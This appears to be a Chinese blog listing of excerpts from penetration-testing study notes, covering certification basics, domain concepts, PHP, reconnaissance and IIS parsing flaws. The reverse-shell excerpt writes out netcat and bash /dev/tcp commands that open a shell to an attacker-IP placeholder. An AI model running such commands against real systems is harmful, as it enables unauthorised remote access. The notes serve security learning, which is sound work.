深信服安全服务认证工程师学习笔记第一章 网络安全基础第一部分 网络安全基础第二部分 操作系统配置与应用第三部分 计算机网络原理与应用第二章 网络渗透测试基础第一部分 渗透测试概述2.1.1 渗透测试标准与流程渗透测试概述 渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击的技术与方法,挫败目标系统的安全控制措施并获得控制访问权的安全测试方法。 网络渗透测试主要依据CVE(Common Vulnerabilities and Exposures)已经发现的安全漏洞,模拟入侵者的攻击方法对网站应用、服务器系统和网络设备进行非破坏性质的攻击性测试。 CVE
内网渗透内网基础知识工作组工作组:工作组是局域网中的一个概念,他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理,将不同的 computer 按照不同的要求分类到不同的组 域域:用来描述一种架构,和“工作组”相对应,由工作组升级而来的高级架构,域 (Domain)是一个有安全边界的计算机集合( 安全边界,意思是在两个域中,一个域中的用户无法访问另一个域中的资源)。可以简单的把域理解成升级版的“工作组”,相比工作组而言,它有一个**更加严格的安全管理控制机制**,如果你想访问域内的资源,就必须拥有一个合法的身份登陆到该域中,而你对该域内的资源拥有什么样的权限,还需要取决于你在该域中的用
反弹Shell方法场景 由于防火墙等的控制访问策略,客户端无法访问服务端,但服务端可以向外网发起请求 IP会动态变化,攻击机无法直接连接 向局域网中的主机散播木马病毒等,网络环境未知的情况下 服务端的AV对正向连接的流量检测非常严格,但是对出网流量校验不足 反弹方式Netcat(nc) 攻击机监听端口 1nc -lvp 2333 受害机执行反弹命令 1nc 攻击机IP 攻击机监听端口 -e /bin/bash Bash 攻击机监听端口 1nc -lvp 2333 在受害机执行: 1234567payload1:bash -i >& /dev/tcp/攻击机
PHP学习1.PHP简述 PHP:超文本预处理器 通用开源脚本语言 php的使用: PHP 可以生成动态页面内容 PHP 可以创建、打开、读取、写入、关闭服务器上的文件 PHP 可以收集表单数据 PHP 可以发送和接收 cookies PHP 可以添加、删除、修改您的数据库中的数据 PHP 可以限制用户访问您的网站上的一些页面 PHP 可以加密数据 2.基本语法格式 PHP 脚本以 <?php 开始,以 ?> 结束 static的关键字的使用 当一个函数完成时,它的所有变量通常都会被删除。 然而,有时候您希望某个局部变量不要被删除。 要做到这一点,请在您第一次声明变量
信息收集1.简介 信息收集是渗透测试的前期主要工作,是非常重要的环节,收集足够多的信息才能方便接下来的测试,信息收集主要是收集网站的域名信息、子域名信息、目标网站信息、目标网站真实IP、敏感/目录文件、开放端口和中间件信息等等。通过各种渠道和手段尽可能收集到多的关于这个站点的信息,有助于我们更多的去找到渗透点,突破口。 2.信息收集分类 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等) dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化
Web中间件解析漏洞中间件:apache、nginx、tomcat、weblogic、jboss等 IIS 5.x-6.x解析漏洞 使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,而不能解析aspx文件。win7-win10中多为iis7.x-8.x了,版本比较高。 目录解析(6.0) 形式:www.xxx.com/xx.asp/xx.jpg 原理:服务器默认会把.asp,.asa目录下的文件都解析成asp文件 文件解析 形式:www.xxx.com/xx.asp
